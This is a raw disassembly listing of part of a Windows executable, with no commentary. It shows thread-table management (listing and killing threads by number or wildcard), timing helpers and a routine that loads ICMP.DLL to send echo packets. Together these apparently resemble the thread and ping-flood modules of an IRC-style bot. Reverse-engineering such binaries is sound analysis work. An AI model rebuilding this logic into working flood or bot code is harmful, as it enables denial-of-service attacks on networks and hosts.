call dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_409381
jg short loc_409340
cmp [ebp+var_8], 0
jbe short loc_409381
loc_409340: ; CODE XREF: sub_409318+20�j
cmp [ebp+var_C], 0
jl short loc_409381
jg short loc_40934E
cmp [ebp+var_10], 0
jbe short loc_409381
loc_40934E: ; CODE XREF: sub_409318+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
sub eax, dword_41E2D0
jmp short locret_40938D
; ---------------------------------------------------------------------------
loc_409381: ; CODE XREF: sub_409318+1E�j
; sub_409318+26�j ...
call dword_4170D0 ; GetTickCount
sub eax, dword_41E2D0
locret_40938D: ; CODE XREF: sub_409318+67�j
leave
retn
sub_409318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40938F proc near ; CODE XREF: sub_4167F1+D5�p
push ebp
mov ebp, esp
and dword_41E2F0, 0
push 1980h
call sub_416B46 ; malloc
pop ecx
mov dword_41E2F8, eax
push offset dword_41E2D8
call sub_409C36
pop ecx
pop ebp
retn
sub_40938F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4093B6 proc near ; DATA XREF: sub_409479+35�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417278
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_20], 0
and [ebp+var_1C], 0
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_1C], eax
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push [ebp+var_20]
call dword_4170DC ; IsBadCodePtr
test eax, eax
jz short loc_409431
cmp dword_41DE38, 0
jz short loc_40942F
push [ebp+var_20]
push offset dword_419474
push offset dword_41DAB4
call sub_40D4AB
add esp, 0Ch
loc_40942F: ; CODE XREF: sub_4093B6+62�j
jmp short loc_409443
; ---------------------------------------------------------------------------
loc_409431: ; CODE XREF: sub_4093B6+59�j
push [ebp+var_1C]
call [ebp+var_20]
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_24]
jmp short loc_409468
; ---------------------------------------------------------------------------
loc_409443: ; CODE XREF: sub_4093B6:loc_40942F�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_409466
; ---------------------------------------------------------------------------
push offset aBtg ; "btg"
push offset aThread ; "thread"
push [ebp+var_14]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_409466: ; CODE XREF: sub_4093B6+91�j
xor eax, eax
loc_409468: ; CODE XREF: sub_4093B6+8B�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_4093B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409479 proc near ; CODE XREF: sub_40764D+14A�p
; sub_409BF1+2F�p ...
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 8
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_409494
xor eax, eax
jmp short locret_4094E4
; ---------------------------------------------------------------------------
loc_409494: ; CODE XREF: sub_409479+15�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
lea eax, [ebp+var_8]
push eax
push 0
push [ebp+var_C]
push offset sub_4093B6
push 20000h
push 0
call sub_416DC0 ; _beginthreadex
add esp, 18h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4094D9
push [ebp+var_4]
call dword_4170A4 ; CloseHandle
push 1
pop eax
jmp short locret_4094E4
; ---------------------------------------------------------------------------
loc_4094D9: ; CODE XREF: sub_409479+50�j
push [ebp+var_C]
call sub_416B4C ; free
pop ecx
xor eax, eax
locret_4094E4: ; CODE XREF: sub_409479+19�j
; sub_409479+5E�j
leave
retn
sub_409479 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4094E6 proc near ; DATA XREF: sub_4095A4+159�o
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_19B = byte ptr -19Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417288
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov al, byte_41DE30
mov [ebp+var_19C], al
push 60h
pop ecx
xor eax, eax
lea edi, [ebp+var_19B]
rep stosd
stosw
stosb
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax+10h]
mov [ebp+var_1A0], eax
mov eax, [ebp+arg_0]
mov eax, [eax]
add eax, 14h
push eax
lea eax, [ebp+var_19C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push [ebp+arg_0]
mov eax, [ebp+arg_0]
mov eax, [eax]
call dword ptr [eax+10h]
mov [ebp+var_1A4], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_1A4]
jmp short loc_409593
; ---------------------------------------------------------------------------
lea eax, [ebp+var_19C]
push eax
push offset aThread ; "thread"
push [ebp+var_14]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
xor eax, eax
loc_409593: ; CODE XREF: sub_4094E6+8A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_4094E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4095A4 proc near ; CODE XREF: sub_4017AA+A2�p
; sub_401D6E+8D�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
push offset dword_41E2D8
call sub_409C6C
pop ecx
cmp dword_41E2F0, 10h
jnz short loc_4095D9
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E2D8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_4095D9: ; CODE XREF: sub_4095A4+18�j
cmp [ebp+arg_8], 0
jz short loc_409627
and [ebp+var_10], 0
jmp short loc_4095EC
; ---------------------------------------------------------------------------
loc_4095E5: ; CODE XREF: sub_4095A4:loc_409625�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_4095EC: ; CODE XREF: sub_4095A4+3F�j
cmp [ebp+var_10], 10h
jge short loc_409627
mov eax, [ebp+var_10]
imul eax, 198h
mov ecx, dword_41E2F8
mov eax, [ecx+eax+10h]
cmp eax, [ebp+arg_0]
jnz short loc_409625
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E2D8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_409625: ; CODE XREF: sub_4095A4+64�j
jmp short loc_4095E5
; ---------------------------------------------------------------------------
loc_409627: ; CODE XREF: sub_4095A4+39�j
; sub_4095A4+4C�j
and [ebp+var_C], 0
and [ebp+var_8], 0
jmp short loc_409638
; ---------------------------------------------------------------------------
loc_409631: ; CODE XREF: sub_4095A4:loc_409672�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_409638: ; CODE XREF: sub_4095A4+8B�j
cmp [ebp+var_8], 10h
jge short loc_409674
mov eax, [ebp+var_8]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jnz short loc_409672
mov eax, [ebp+var_8]
imul eax, 198h
mov ecx, dword_41E2F8
add ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
jmp short loc_409674
; ---------------------------------------------------------------------------
loc_409672: ; CODE XREF: sub_4095A4+AE�j
jmp short loc_409631
; ---------------------------------------------------------------------------
loc_409674: ; CODE XREF: sub_4095A4+98�j
; sub_4095A4+CC�j
cmp [ebp+var_C], 0
jnz short loc_409695
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E2D8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_409695: ; CODE XREF: sub_4095A4+D4�j
cmp [ebp+arg_4], 0
jz short loc_4096A3
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov [eax], ecx
loc_4096A3: ; CODE XREF: sub_4095A4+F5�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [eax+10h], ecx
lea eax, [ebp+arg_10]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_C]
mov eax, [ebp+var_C]
add eax, 14h
push eax
call sub_416DC6 ; vsprintf
add esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+var_C]
and dword ptr [eax+4], 0
mov eax, dword_41E2F0
inc eax
mov dword_41E2F0, eax
cmp [ebp+arg_4], 0
jz short loc_4096EB
mov eax, [ebp+arg_4]
mov [ebp+var_14], eax
jmp short loc_4096F1
; ---------------------------------------------------------------------------
loc_4096EB: ; CODE XREF: sub_4095A4+13D�j
mov eax, [ebp+var_C]
mov [ebp+var_14], eax
loc_4096F1: ; CODE XREF: sub_4095A4+145�j
mov eax, [ebp+var_C]
add eax, 0Ch
push eax
push 0
push [ebp+var_14]
push offset sub_4094E6
push 0
push 0
call sub_416DC0 ; _beginthreadex
add esp, 18h
mov ecx, [ebp+var_C]
mov [ecx+8], eax
mov eax, [ebp+var_C]
cmp dword ptr [eax+8], 0
jnz short loc_409753
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
mov eax, dword_41E2F0
dec eax
mov dword_41E2F0, eax
push 198h
push 0
lea eax, [ebp+var_C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push offset dword_41E2D8
call sub_409C7A
pop ecx
xor eax, eax
jmp short locret_409761
; ---------------------------------------------------------------------------
loc_409753: ; CODE XREF: sub_4095A4+177�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
push 1
pop eax
locret_409761: ; CODE XREF: sub_4095A4+30�j
; sub_4095A4+7C�j ...
leave
retn
sub_4095A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409763 proc near ; CODE XREF: sub_401244+73�p
; sub_401244+547�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push offset dword_41E2D8
call sub_409C6C
pop ecx
mov eax, dword_41E2F0
dec eax
mov dword_41E2F0, eax
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call dword_4170A4 ; CloseHandle
push 198h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
push offset dword_41E2D8
call sub_409C7A
pop ecx
pop ebp
retn
sub_409763 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4097A7 proc near ; CODE XREF: sub_40A9CF+EBF�p
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 194h
cmp [ebp+arg_0], 0
jnz short loc_4097BB
jmp locret_4098F1
; ---------------------------------------------------------------------------
loc_4097BB: ; CODE XREF: sub_4097A7+D�j
push [ebp+arg_0]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_409825
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
push offset dword_41E2D8
call sub_409C6C
pop ecx
cmp [ebp+var_4], 10h
jnb short loc_409815
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jz short loc_409815
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
mov dword ptr [ecx+eax+4], 1
loc_409815: ; CODE XREF: sub_4097A7+3F�j
; sub_4097A7+55�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
jmp locret_4098F1
; ---------------------------------------------------------------------------
loc_409825: ; CODE XREF: sub_4097A7+22�j
push [ebp+arg_0]
push offset aS ; "*%s*"
push 185h
lea eax, [ebp+var_190]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41E2D8
call sub_409C6C
pop ecx
mov eax, dword_41E2F0
mov [ebp+var_8], eax
and [ebp+var_194], 0
jmp short loc_40986A
; ---------------------------------------------------------------------------
loc_40985D: ; CODE XREF: sub_4097A7:loc_4098E1�j
mov eax, [ebp+var_194]
inc eax
mov [ebp+var_194], eax
loc_40986A: ; CODE XREF: sub_4097A7+B4�j
cmp [ebp+var_194], 10h
jnb short loc_4098E6
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jz short loc_4098E1
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
lea eax, [ebp+var_190]
push eax
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, dword_41E2F8
lea eax, [ecx+eax+14h]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_4098D9
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, dword_41E2F8
mov dword ptr [ecx+eax+4], 1
loc_4098D9: ; CODE XREF: sub_4097A7+116�j
cmp [ebp+var_8], 0
jnz short loc_4098E1
jmp short loc_4098E6
; ---------------------------------------------------------------------------
loc_4098E1: ; CODE XREF: sub_4097A7+E3�j
; sub_4097A7+136�j
jmp loc_40985D
; ---------------------------------------------------------------------------
loc_4098E6: ; CODE XREF: sub_4097A7+CA�j
; sub_4097A7+138�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
locret_4098F1: ; CODE XREF: sub_4097A7+F�j
; sub_4097A7+79�j
leave
retn
sub_4097A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4098F3 proc near ; CODE XREF: sub_40A9CF+F13�p
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_194 = byte ptr -194h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 19Ch
cmp [ebp+arg_0], 0
jnz short loc_409907
jmp locret_409AD3
; ---------------------------------------------------------------------------
loc_409907: ; CODE XREF: sub_4098F3+D�j
push [ebp+arg_0]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz loc_4099B4
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
push offset dword_41E2D8
call sub_409C6C
pop ecx
cmp [ebp+var_4], 10h
jnb short loc_4099A4
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jz short loc_4099A4
mov eax, dword_41E2F0
dec eax
mov dword_41E2F0, eax
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
mov eax, [ecx+eax+8]
mov [ebp+var_8], eax
push 198h
push 0
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
add ecx, eax
push ecx
call sub_416B6A ; memset
add esp, 0Ch
push 0
push [ebp+var_8]
call dword_4170E0 ; TerminateThread
push [ebp+var_8]
call dword_4170A4 ; CloseHandle
loc_4099A4: ; CODE XREF: sub_4098F3+43�j
; sub_4098F3+59�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
jmp locret_409AD3
; ---------------------------------------------------------------------------
loc_4099B4: ; CODE XREF: sub_4098F3+22�j
push [ebp+arg_0]
push offset aS ; "*%s*"
push 185h
lea eax, [ebp+var_194]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41E2D8
call sub_409C6C
pop ecx
mov eax, dword_41E2F0
mov [ebp+var_C], eax
and [ebp+var_198], 0
jmp short loc_4099F9
; ---------------------------------------------------------------------------
loc_4099EC: ; CODE XREF: sub_4098F3:loc_409AC3�j
mov eax, [ebp+var_198]
inc eax
mov [ebp+var_198], eax
loc_4099F9: ; CODE XREF: sub_4098F3+F7�j
cmp [ebp+var_198], 10h
jnb loc_409AC8
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jz loc_409AC3
mov eax, [ebp+var_C]
dec eax
mov [ebp+var_C], eax
lea eax, [ebp+var_194]
push eax
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2F8
lea eax, [ecx+eax+14h]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_409ABB
mov eax, dword_41E2F0
dec eax
mov dword_41E2F0, eax
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2F8
mov eax, [ecx+eax+8]
mov [ebp+var_19C], eax
push 198h
push 0
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2F8
add ecx, eax
push ecx
call sub_416B6A ; memset
add esp, 0Ch
push 0
push [ebp+var_19C]
call dword_4170E0 ; TerminateThread
push [ebp+var_19C]
call dword_4170A4 ; CloseHandle
loc_409ABB: ; CODE XREF: sub_4098F3+161�j
cmp [ebp+var_C], 0
jnz short loc_409AC3
jmp short loc_409AC8
; ---------------------------------------------------------------------------
loc_409AC3: ; CODE XREF: sub_4098F3+12A�j
; sub_4098F3+1CC�j
jmp loc_4099EC
; ---------------------------------------------------------------------------
loc_409AC8: ; CODE XREF: sub_4098F3+10D�j
; sub_4098F3+1CE�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
locret_409AD3: ; CODE XREF: sub_4098F3+F�j
; sub_4098F3+BC�j
leave
retn
sub_4098F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409AD5 proc near ; DATA XREF: sub_409BF1+2A�o
var_1A8 = byte ptr -1A8h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A8h
push 1A3h
push [ebp+arg_0]
lea eax, [ebp+var_1A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
cmp dword_41E2F0, 0
jz short loc_409B25
push 10h
push dword_41E2F0
push offset dword_4194EC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_409B3F
; ---------------------------------------------------------------------------
loc_409B25: ; CODE XREF: sub_409AD5+30�j
push offset dword_4194CC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
pop ecx
pop ecx
xor eax, eax
jmp locret_409BED
; ---------------------------------------------------------------------------
loc_409B3F: ; CODE XREF: sub_409AD5+4E�j
push offset dword_41E2D8
call sub_409C6C
pop ecx
and [ebp+var_10], 0
and [ebp+var_4], 0
jmp short loc_409B5B
; ---------------------------------------------------------------------------
loc_409B54: ; CODE XREF: sub_409AD5:loc_409BDB�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_409B5B: ; CODE XREF: sub_409AD5+7D�j
cmp [ebp+var_4], 10h
jge short loc_409BE0
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+8], 0
jz short loc_409BDB
push offset dword_41E2D8
call sub_409C7A
pop ecx
push 3E8h
call dword_41709C ; Sleep
push offset dword_41E2D8
call sub_409C6C
pop ecx
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
lea eax, [ecx+eax+14h]
push eax
push [ebp+var_4]
push offset dword_4194BC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
add esp, 10h
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2F8
cmp dword ptr [ecx+eax+4], 0
jz short loc_409BDB
jmp short loc_409BE0
; ---------------------------------------------------------------------------
loc_409BDB: ; CODE XREF: sub_409AD5+A0�j
; sub_409AD5+102�j
jmp loc_409B54
; ---------------------------------------------------------------------------
loc_409BE0: ; CODE XREF: sub_409AD5+8A�j
; sub_409AD5+104�j
push offset dword_41E2D8
call sub_409C7A
pop ecx
xor eax, eax
locret_409BED: ; CODE XREF: sub_409AD5+65�j
leave
retn 4
sub_409AD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409BF1 proc near ; CODE XREF: sub_40A9CF+AFB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A3h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_409C0B
jmp short locret_409C34
; ---------------------------------------------------------------------------
loc_409C0B: ; CODE XREF: sub_409BF1+16�j
push [ebp+arg_0]
push [ebp+var_4]
call sub_405F67
pop ecx
pop ecx
push [ebp+arg_0]
push offset sub_409AD5
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short locret_409C34
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
locret_409C34: ; CODE XREF: sub_409BF1+18�j
; sub_409BF1+38�j
leave
retn
sub_409BF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C36 proc near ; CODE XREF: sub_405FA3+9�p
; sub_40938F+1F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 18h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
cmp dword_41DE40, 0
jz short loc_409C61
push 80000400h
push [ebp+arg_0]
call dword_41DE40 ; InitializeCriticalSectionAndSpinCount
jmp short loc_409C6A
; ---------------------------------------------------------------------------
loc_409C61: ; CODE XREF: sub_409C36+19�j
push [ebp+arg_0]
call dword_4170E4 ; InitializeCriticalSection
loc_409C6A: ; CODE XREF: sub_409C36+29�j
pop ebp
retn
sub_409C36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C6C proc near ; CODE XREF: sub_406041+10�p
; sub_4095A4+B�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call dword_4170EC ; RtlEnterCriticalSection
pop ebp
retn
sub_409C6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C7A proc near ; CODE XREF: sub_406041+26�p
; sub_406041+307�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call dword_41710C ; RtlLeaveCriticalSection
pop ebp
retn
sub_409C7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C88 proc near ; CODE XREF: sub_40332B+10�p
; sub_41113B+7ED�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xadd [esi], eax
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409C88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C9D proc near ; CODE XREF: sub_4042FB+17�p
; sub_4042FB+25�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xchg eax, [esi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409C9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409CB1 proc near ; CODE XREF: sub_409DD0+202�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 38h
call dword_41E2FC ; IcmpCreateFile
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_409CD8
push offset aCouldNotGetAVa ; "Could not get a valid ICMP handle\n"
call sub_416DD8 ; printf
pop ecx
xor eax, eax
jmp locret_409DCE
; ---------------------------------------------------------------------------
loc_409CD8: ; CODE XREF: sub_409CB1+13�j
push 8
push 0
lea eax, [ebp+var_18]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov al, [ebp+arg_8]
mov [ebp+var_18], al
movzx eax, [ebp+arg_10]
push eax
call sub_416DD2
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_C], eax
movzx eax, [ebp+arg_10]
push eax
push 45h
push [ebp+var_C]
call sub_416B6A ; memset
add esp, 0Ch
movzx eax, [ebp+arg_10]
cmp eax, 8
jge short loc_409D26
mov [ebp+var_38], 8
jmp short loc_409D2D
; ---------------------------------------------------------------------------
loc_409D26: ; CODE XREF: sub_409CB1+6A�j
movzx eax, [ebp+arg_10]
mov [ebp+var_38], eax
loc_409D2D: ; CODE XREF: sub_409CB1+73�j
mov eax, [ebp+var_38]
add eax, 1Ch
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_416DD2
pop ecx
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
push [ebp+arg_C]
push [ebp+var_24]
push [ebp+var_10]
lea eax, [ebp+var_18]
push eax
movzx ax, [ebp+arg_10]
push eax
push [ebp+var_C]
push [ebp+arg_0]
push [ebp+var_1C]
call dword_41E308 ; IcmpSendEcho
mov [ebp+var_20], eax
mov [ebp+var_8], 1
cmp [ebp+var_20], 1
jz short loc_409D8D
call dword_417064 ; RtlGetLastWin32Error
mov ecx, [ebp+arg_4]
mov [ecx], eax
jmp short loc_409DA4
; ---------------------------------------------------------------------------
loc_409D8D: ; CODE XREF: sub_409CB1+CD�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov [eax+4], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov ecx, [ecx+8]
mov [eax+8], ecx
loc_409DA4: ; CODE XREF: sub_409CB1+DA�j
push [ebp+var_1C]
call dword_41E304 ; IcmpCloseHandle
mov eax, [ebp+var_C]
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_416DCC
pop ecx
mov eax, [ebp+var_10]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_416DCC
pop ecx
mov eax, [ebp+var_8]
locret_409DCE: ; CODE XREF: sub_409CB1+22�j
leave
retn
sub_409CB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409DD0 proc near ; DATA XREF: sub_40A1A7+FD�o
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = byte ptr -2B0h
var_10D = byte ptr -10Dh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2F0h
push 2ACh
push [ebp+arg_0]
lea eax, [ebp+var_2B0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movzx eax, byte_41E310
test eax, eax
jnz short loc_409E6D
push offset aIcmp_dll ; "ICMP.DLL"
call dword_417054 ; LoadLibraryA
mov dword_41E300, eax
cmp dword_41E300, 0
jnz short loc_409E24
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E24: ; CODE XREF: sub_409DD0+4B�j
push offset aIcmpcreatefile ; "IcmpCreateFile"
push dword_41E300
call dword_417058 ; GetProcAddress
mov dword_41E2FC, eax
push offset aIcmpsendecho ; "IcmpSendEcho"
push dword_41E300
call dword_417058 ; GetProcAddress
mov dword_41E308, eax
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push dword_41E300
